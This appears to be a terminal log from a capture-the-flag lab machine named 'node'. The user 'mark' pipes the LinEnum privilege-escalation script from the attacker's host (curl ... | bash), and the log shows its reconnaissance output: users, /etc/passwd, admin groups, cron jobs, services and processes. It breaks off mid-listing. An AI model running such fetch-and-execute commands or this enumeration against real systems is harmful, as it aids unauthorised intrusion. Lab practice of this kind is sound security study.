mark@node:~$ curl 10.10.14.7:8000/LinEnum.sh | bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--   100 45639  100 45639    0     0  58090      0 --:--:-- --:--:-- --:--:-- 58138

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.96

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Wed  7 Aug 11:30:52 BST 2019


### SYSTEM ##############################################
[-] Kernel information:
Linux node 4.4.0-93-generic #116-Ubuntu SMP Fri Aug 11 21:17:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux


[-] Kernel information (continued):
Linux version 4.4.0-93-generic (buildd@lgw01-03) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #116-Ubuntu SMP Fri Aug 11 21:17:51 UTC 2017


[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.3 LTS"
NAME="Ubuntu"
VERSION="16.04.3 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.3 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial


[-] Hostname:
node


### USER/GROUP ##########################################
[-] Current user/group info:
uid=1001(mark) gid=1001(mark) groups=1001(mark)


[-] Users that have previously logged onto the system:
Username         Port     From             Latest
root             tty1                      Thu Jan 18 14:39:42 +0000 2018
tom              pts/0    10.2.0.1         Sun Sep  3 16:03:08 +0100 2017
mark             pts/0    10.10.14.7       Wed Aug  7 11:26:16 +0100 2019


[-] Who else is logged on:
 11:30:52 up  5:56,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
mark     pts/0    10.10.14.7       11:26    4.00s  0.07s  0.00s bash


[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root),1002(admin)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(messagebus) gid=111(messagebus) groups=111(messagebus)
uid=108(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=109(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)
uid=111(mongodb) gid=65534(nogroup) groups=65534(nogroup),117(mongodb)
uid=1001(mark) gid=1001(mark) groups=1001(mark)


[-] It looks like we have some admin users:
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)


[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
tom:x:1000:1000:tom,,,:/home/tom:/bin/bash
mongodb:x:111:65534::/home/mongodb:/bin/false
mark:x:1001:1001:Mark,,,:/home/mark:/bin/bash


[-] Super user account(s):
root


[-] Are permissions on /home directories lax:
total 20K
drwxr-xr-x  5 root root 4.0K Aug 31  2017 .
drwxr-xr-x 25 root root 4.0K Sep  2  2017 ..
drwxr-xr-x  2 root root 4.0K Aug 31  2017 frank
drwxr-xr-x  3 root root 4.0K Sep  3  2017 mark
drwxr-xr-x  6 root root 4.0K Sep  3  2017 tom


### ENVIRONMENTAL #######################################
[-] Environment information:
XDG_SESSION_ID=9
SHELL=/bin/bash
TERM=screen
SSH_CLIENT=10.10.14.7 46270 22
SSH_TTY=/dev/pts/0
USER=mark
PATH=/home/mark/bin:/home/mark/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
MAIL=/var/mail/mark
PWD=/home/mark
LANG=en_GB.UTF-8
HOME=/home/mark
SHLVL=2
LANGUAGE=en_GB:en
LOGNAME=mark
SSH_CONNECTION=10.10.14.7 46270 10.10.10.58 22
LESSOPEN=| /usr/bin/lesspipe %s
XDG_RUNTIME_DIR=/run/user/1001
LESSCLOSE=/usr/bin/lesspipe %s %s
_=/usr/bin/env


[-] Path information:
/home/mark/bin:/home/mark/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin


[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/tmux
/usr/bin/screen


[-] Current umask value:
0002
u=rwx,g=rwx,o=rx


[-] umask value as specified in /etc/login.defs:
UMASK           022


[-] Password and storage information:
PASS_MAX_DAYS   99999
PASS_MIN_DAYS   0
PASS_WARN_AGE   7
ENCRYPT_METHOD SHA512


### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root  722 Apr  5  2016 /etc/crontab

/etc/cron.d:
total 20
drwxr-xr-x  2 root root 4096 Aug 29  2017 .
drwxr-xr-x 92 root root 4096 Jan 18  2018 ..
-rw-r--r--  1 root root  589 Jul 16  2014 mdadm
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rw-r--r--  1 root root  189 Aug 29  2017 popularity-contest

/etc/cron.daily:
total 56
drwxr-xr-x  2 root root 4096 Aug 29  2017 .
drwxr-xr-x 92 root root 4096 Jan 18  2018 ..
-rwxr-xr-x  1 root root  376 Mar 31  2016 apport
-rwxr-xr-x  1 root root 1474 Jun 19  2017 apt-compat
-rwxr-xr-x  1 root root  355 May 22  2012 bsdmainutils
-rwxr-xr-x  1 root root 1597 Nov 26  2015 dpkg
-rwxr-xr-x  1 root root  372 May  6  2015 logrotate
-rwxr-xr-x  1 root root 1293 Nov  6  2015 man-db
-rwxr-xr-x  1 root root  539 Jul 16  2014 mdadm
-rwxr-xr-x  1 root root  435 Nov 18  2014 mlocate
-rwxr-xr-x  1 root root  249 Nov 12  2015 passwd
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rwxr-xr-x  1 root root 3449 Feb 26  2016 popularity-contest
-rwxr-xr-x  1 root root  214 May 24  2016 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Aug 29  2017 .
drwxr-xr-x 92 root root 4096 Jan 18  2018 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 Aug 29  2017 .
drwxr-xr-x 92 root root 4096 Jan 18  2018 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder

/etc/cron.weekly:
total 24
drwxr-xr-x  2 root root 4096 Aug 29  2017 .
drwxr-xr-x 92 root root 4096 Jan 18  2018 ..
-rwxr-xr-x  1 root root   86 Apr 13  2016 fstrim
-rwxr-xr-x  1 root root  771 Nov  6  2015 man-db
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rwxr-xr-x  1 root root  211 May 24  2016 update-notifier-common


[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


[-] Systemd timers:
NEXT                         LEFT          LAST                         PASSED       UNIT                         ACTIVATES
Wed 2019-08-07 11:31:38 BST  42s left      Wed 2019-08-07 05:34:54 BST  5h 56min ago snapd.refresh.timer          snapd.refresh.service
Wed 2019-08-07 14:54:46 BST  3h 23min left Wed 2019-08-07 05:34:55 BST  5h 56min ago apt-daily.timer              apt-daily.service
Thu 2019-08-08 05:49:54 BST  18h left      Wed 2019-08-07 05:49:54 BST  5h 41min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Thu 2019-08-08 06:37:51 BST  19h left      Wed 2019-08-07 06:06:54 BST  5h 24min ago apt-daily-upgrade.timer      apt-daily-upgrade.service

4 timers listed.
Enable thorough tests to see inactive timers


### NETWORKING  ##########################################
[-] Network and IP info:
ens33     Link encap:Ethernet  HWaddr 00:50:56:bf:46:29
          inet addr:10.10.10.58  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:febf:4629/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:36240 errors:0 dropped:22 overruns:0 frame:0
          TX packets:37752 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2613074 (2.6 MB)  TX bytes:51500119 (51.5 MB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:160286 errors:0 dropped:0 overruns:0 frame:0
          TX packets:160286 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:13151674 (13.1 MB)  TX bytes:13151674 (13.1 MB)


[-] ARP history:
? (10.10.10.2) at 00:50:56:bf:e0:44 [ether] on ens33


[-] Default route:
default         10.10.10.2      0.0.0.0         UG    0      0        0 ens33


[-] Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:27017         0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:39358         127.0.0.1:27017         ESTABLISHED -
tcp        0      0 127.0.0.1:27017         127.0.0.1:39360         ESTABLISHED -
tcp        0      0 127.0.0.1:39360         127.0.0.1:27017         ESTABLISHED -
tcp        0      0 127.0.0.1:27017         127.0.0.1:39362         ESTABLISHED -
tcp        0      0 127.0.0.1:39362         127.0.0.1:27017         ESTABLISHED -
tcp        0      0 127.0.0.1:27017         127.0.0.1:39358         ESTABLISHED -
tcp        0   7624 10.10.10.58:22          10.10.14.7:46270        ESTABLISHED -
tcp6       0      0 :::3000                 :::*                    LISTEN      -


[-] Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name


### SERVICES #############################################
[-] Running processes:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.7  37884  5912 ?        Ss   05:34   0:03 /sbin/init
root         2  0.0  0.0      0     0 ?        S    05:34   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    05:34   0:00 [ksoftirqd/0]
root         4  0.0  0.0      0     0 ?        S    05:34   0:13 [kworker/0:0]
root         5  0.0  0.0      0     0 ?        S<   05:34   0:00 [kworker/0:0H]
root         7  0.0  0.0      0     0 ?        S    05:34   0:02 [rcu_sched]
root         8  0.0  0.0      0     0 ?        S    05:34   0:00 [rcu_bh]
root         9  0.0  0.0      0     0 ?        S    05:34   0:00 [migration/0]
root        10  0.0  0.0      0     0 ?        S    05:34   0:00 [watchdog/0]
root        11  0.0  0.0      0     0 ?        S    05:34   0:00 [kdevtmpfs]
root        12  0.0  0.0      0     0 ?        S<   05:34   0:00 [netns]
root        13  0.0  0.0      0     0 ?        S<   05:34   0:00 [perf]
root        14  0.0  0.0      0     0 ?        S    05:34   0:00 [khungtaskd]
root        15  0.0  0.0      0     0 ?        S<   05:34   0:00 [writeback]
root        16  0.0  0.0      0     0 ?        SN   05:34   0:00 [ksmd]
root        17  0.0  0.0      0     0 ?        SN   05:34   0:00 [khugepaged]
root        18  0.0  0.0      0     0 ?        S<   05:34   0:00 [crypto]
root        19  0.0  0.0      0     0 ?        S<   05:34   0:00 [kintegrityd]
root        20  0.0  0.0      0     0 ?        S<   05:34   0:00 [bioset]
root        21  0.0  0.0      0     0 ?        S<   05:34   0:00 [kblockd]
root        22  0.0  0.0      0     0 ?        S<   05:34   0:00 [ata_sff]
root        23  0.0  0.0      0     0 ?        S<   05:34   0:00 [md]
root        24  0.0  0.0      0     0 ?        S<   05:34   0:00 [devfreq_wq]
root        28  0.0  0.0      0     0 ?        S    05:34   0:00 [kswapd0]
root        29  0.0  0.0      0     0 ?        S<   05:34   0:00 [vmstat]
root        30  0.0  0.0      0     0 ?        S    05:34   0:00 [fsnotify_mark]
root        31  0.0  0.0      0     0 ?        S    05:34   0:00 [ecryptfs-kthrea]
root        47  0.0  0.0      0     0 ?        S<   05:34   0:00 [kthrotld]
root        48  0.0  0.0      0     0 ?        S<   05:34   0:00 [acpi_thermal_pm]
root        49  0.0  0.0      0     0 ?        S<   05:34   0:00 [bioset]
root        50  0.0  0.0      0     0 ?        S<   05:34   0:00 [bioset]
root        51  0.0  0.0      0     0 ?        S<   05:34   0:00 [bioset]
root        52  0.0  0.0      0     0 ?        S<   05:34   0:00 [bioset]
root        53  0.0  0.0      0     0 ?        S<   05:34   0:00 [bioset]
root        54  0.0  0.0      0     0 ?        S<   05:34   0:00 [bioset]
root        55  0.0  0.0      0     0 ?        S<   05:34   0:00 [bioset]
root        56  0.0  0.0      0     0 ?        S<   05:34   0:00 [bioset]
root        57  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_0]
root        58  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_0]
root        59  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_1]
root        60  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_1]
root        66  0.0  0.0      0     0 ?        S<   05:34   0:00 [ipv6_addrconf]
root        79  0.0  0.0      0     0 ?        S<   05:34   0:00 [deferwq]
root        80  0.0  0.0      0     0 ?        S<   05:34   0:00 [charger_manager]
root        82  0.0  0.0      0     0 ?        S<   05:34   0:00 [bioset]
root       131  0.0  0.0      0     0 ?        S<   05:34   0:00 [kpsmoused]
root       133  0.0  0.0      0     0 ?        S<   05:34   0:00 [ttm_swap]
root       162  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_2]
root       163  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_2]
root       164  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_3]
root       165  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_3]
root       166  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_4]
root       167  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_4]
root       168  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_5]
root       169  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_5]
root       170  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_6]
root       171  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_6]
root       172  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_7]
root       173  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_7]
root       174  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_8]
root       175  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_8]
root       176  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_9]
root       177  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_9]
root       178  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_10]
root       179  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_10]
root       180  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_11]
root       181  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_11]
root       182  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_12]
root       183  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_12]
root       184  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_13]
root       185  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_13]
root       186  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_14]
root       187  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_14]
root       188  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_15]
root       189  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_15]
root       190  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_16]
root       191  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_16]
root       192  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_17]
root       193  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_17]
root       194  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_18]
root       195  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_18]
root       196  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_19]
root       197  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_19]
root       198  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_20]
root       199  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_20]
root       200  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_21]
root       201  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_21]
root       202  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_22]
root       203  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_22]
root       204  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_23]
root       205  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_23]
root       206  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_24]
root       207  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_24]
root       208  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_25]
root       209  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_25]
root       210  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_26]
root       211  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_26]
root       212  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_27]
root       213  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_27]
root       214  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_28]
root       215  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_28]
root       216  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_29]
root       217  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_29]
root       218  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_30]
root       219  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_30]
root       220  0.0  0.0      0     0 ?        S    05:34   0:00 [scsi_eh_31]
root       221  0.0  0.0      0     0 ?        S<   05:34   0:00 [scsi_tmf_31]
root       250  0.0  0.0      0     0 ?        S<   05:34   0:00 [bioset]
root       322  0.0  0.0      0     0 ?        S<   05:34   0:00 [raid5wq]
root       347  0.0  0.0      0     0 ?        S<   05:34   0:00 [kdmflush]
root       348  0.0  0.0      0     0 ?        S<   05:34   0:00 [bioset]
root       357  0.0  0.0      0     0 ?        S<   05:34   0:00 [kdmflush]
root       358  0.0  0.0      0     0 ?        S<   05:34   0:00 [bioset]
root       374  0.0  0.0      0     0 ?        S<   05:34   0:00 [bioset]
root       402  0.0  0.0      0     0 ?        S    05:34   0:00 [jbd2/dm-0-8]
root       403  0.0  0.0      0     0 ?        S<   05:34   0:00 [ext4-rsv-conver]
root       444  0.0  0.0      0     0 ?        S<   05:34   0:00 [kworker/0:1H]
root       457  0.0  0.0      0     0 ?        S<   05:34   0:00 [iscsi_eh]
root       468  0.0  0.0      0     0 ?        S<   05:34   0:00 [ib_addr]
root       470  0.0  0.3  28032  2988 ?        Ss   05:34   0:00 /lib/systemd/systemd-journald
root       479  0.0  0.0      0     0 ?        S    05:34   0:00 [kauditd]
root       494  0.0  0.0      0     0 ?        S<   05:34   0:00 [ib_mcast]
root       495  0.0  0.0      0     0 ?        S<   05:34   0:00 [ib_nl_sa_wq]
root       496  0.0  0.0      0     0 ?        S<   05:34   0:00 [ib_cm]
root       498  0.0  0.2 102968  1536 ?        Ss   05:34   0:00 /sbin/lvmetad -f
root       499  0.0  0.0      0     0 ?        S<   05:34   0:00 [iw_cm_wq]
root       508  0.0  0.0      0     0 ?        S<   05:34   0:00 [rdma_cm]
root       529  0.0  0.4  44312  3724 ?        Ss   05:34   0:00 /lib/systemd/systemd-udevd
root       850  0.0  0.0      0     0 ?        S<   05:34   0:00 [ext4-rsv-conver]
systemd+   886  0.0  0.3 100324  2324 ?        Ssl  05:34   0:02 /lib/systemd/systemd-timesyncd
root      1045  0.0  0.5 637460  4068 ?        Ssl  05:34   0:00 /usr/bin/lxcfs /var/lib/lxcfs/
syslog    1046  0.0  0.4 256400  3036 ?        Ssl  05:34   0:00 /usr/sbin/rsyslogd -n
message+  1049  0.0  0.5  42908  3804 ?        Ss   05:34   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root      1073  0.0  0.4  28548  3124 ?        Ss   05:34   0:00 /lib/systemd/systemd-logind
root      1074  0.0  0.7 275892  5852 ?        Ssl  05:34   0:00 /usr/lib/accountsservice/accounts-daemon
root      1075  0.0  1.2 185756  9708 ?        Ssl  05:34   0:16 /usr/bin/vmtoolsd
root      1077  0.0  0.3  29008  2448 ?        Ss   05:34   0:00 /usr/sbin/cron -f
daemon    1083  0.0  0.2  26044  2100 ?        Ss   05:34   0:00 /usr/sbin/atd -f
root      1089  0.0  0.1   4400  1276 ?        Ss   05:34   0:00 /usr/sbin/acpid
root      1099  0.0  3.2 350312 24416 ?        S<sl 05:34   0:00 /usr/lib/snapd/snapd
root      1131  0.0  0.0  13376   164 ?        Ss   05:34   0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
root      1145  0.0  0.7 277180  6000 ?        Ssl  05:34   0:00 /usr/lib/policykit-1/polkitd --no-debug
root      1229  0.0  0.6  65520  5248 ?        Ss   05:34   0:00 /usr/sbin/sshd -D
tom       1230  0.0  5.8 1074104 44580 ?       Ssl  05:34   0:05 /usr/bin/node /var/scheduler/app.js
mongodb   1233  0.5 11.7 281952 89176 ?        Ssl  05:34   1:57 /usr/bin/mongod --auth --quiet --config /etc/mongod.conf
tom       1237  0.0  8.9 1038232 67784 ?       Ssl  05:34   0:09 /usr/bin/node /var/www/myplace/app.js
root      1254  0.0  0.0   5224   156 ?        Ss   05:34   0:00 /sbin/iscsid
root      1255  0.0  0.4   5724  3524 ?        S<Ls 05:34   0:02 /sbin/iscsid
root      1316  0.0  0.2  15940  1632 tty1     Ss+  05:34   0:00 /sbin/agetty --noclear tty1 linux
root      1504  0.0  0.0      0     0 ?        S    06:06   0:00 [kworker/0:2]
root     16191  0.0  0.0      0     0 ?        S    10:57   0:00 [kworker/u2:0]
root     16225  0.0  0.0      0     0 ?        S    11:23   0:00 [kworker/u2:2]
root     16226  0.0  0.8  95404  6812 ?        Ss   11:26   0:00 sshd: mark [priv]
mark     16228  0.0  0.6  45248  4744 ?        Ss   11:26   0:00 /lib/systemd/systemd --user
root     16230  0.0  0.0      0     0 ?        S    11:26   0:00 [kworker/0:1]
mark     16233  0.0  0.2  61336  2064 ?        S    11:26   0:00 (sd-pam)
mark     16238  0.0  0.5  95404  4256 ?        S    11:26   0:00 sshd: mark@pts/0
mark     16239  0.0  0.6  22620  5176 pts/0    Ss   11:26   0:00 -bash
mark     16256  0.3  0.5  13496  4044 pts/0    S+   11:30   0:00 bash
mark     16257  0.0  0.4  13548  3480 pts/0    S+   11:30   0:00 bash
mark     16258  0.0  0.0   7316   680 pts/0    S+   11:30   0:00 tee -a
mark     16444  0.0  0.3  13532  2904 pts/0    S+   11:30   0:00 bash
mark     16445  0.0  0.4  37372  3404 pts/0    R+   11:30   0:00 ps aux


[-] Process binaries and associated permissions (from above list):
1.6M -rwxr-xr-x 1 root root 1.6M Jul 19  2017 /lib/systemd/systemd
320K -rwxr-xr-x 1 root root 319K Jul 19  2017 /lib/systemd/systemd-journald
608K -rwxr-xr-x 1 root root 605K Jul 19  2017 /lib/systemd/systemd-logind
140K -rwxr-xr-x 1 root root 139K Jul 19  2017 /lib/systemd/systemd-timesyncd
444K -rwxr-xr-x 1 root root 443K Jul 19  2017 /lib/systemd/systemd-udevd
 44K -rwxr-xr-x 1 root root  44K Jun 14  2017 /sbin/agetty
   0 lrwxrwxrwx 1 root root   20 Aug 29  2017 /sbin/init -> /lib/systemd/systemd
768K -rwxr-xr-x 1 root root 766K Jul 26  2017 /sbin/iscsid
 52K -rwxr-xr-x 1 root root  51K Apr 16  2016 /sbin/lvmetad
504K -rwxr-xr-x 1 root root 502K Feb 20  2017 /sbin/mdadm
220K -rwxr-xr-x 1 root root 219K Jan 12  2017 /usr/bin/dbus-daemon
 20K -rwxr-xr-x 1 root root  19K Jul  5  2017 /usr/bin/lxcfs
 37M -rwxr-xr-x 1 root root  37M Jul 27  2017 /usr/bin/mongod
   0 lrwxrwxrwx 1 root root   22 Aug 30  2017 /usr/bin/node -> /etc/alternatives/node
 44K -rwxr-xr-x 1 root root  44K Feb  9  2017 /usr/bin/vmtoolsd
164K -rwxr-xr-x 1 root root 162K Nov  3  2016 /usr/lib/accountsservice/accounts-daemon
 16K -rwxr-xr-x 1 root root  15K Jan 17  2016 /usr/lib/policykit-1/polkitd
 19M -rwxr-xr-x 1 root root  19M Jul 17  2017 /usr/lib/snapd/snapd
 48K -rwxr-xr-x 1 root root  47K Apr  8  2016 /usr/sbin/acpid
 28K -rwxr-xr-x 1 root root  27K Jan 14  2016 /usr/sbin/atd
 44K -rwxr-xr-x 1 root root  44K Apr  5  2016 /usr/sbin/cron
588K -rwxr-xr-x 1 root root 586K Apr  5  2016 /usr/sbin/rsyslogd
784K -rwxr-xr-x 1 root root 781K Mar 16  2017 /usr/sbin/sshd


[-] /etc/init.d/ binary permissions:
total 304
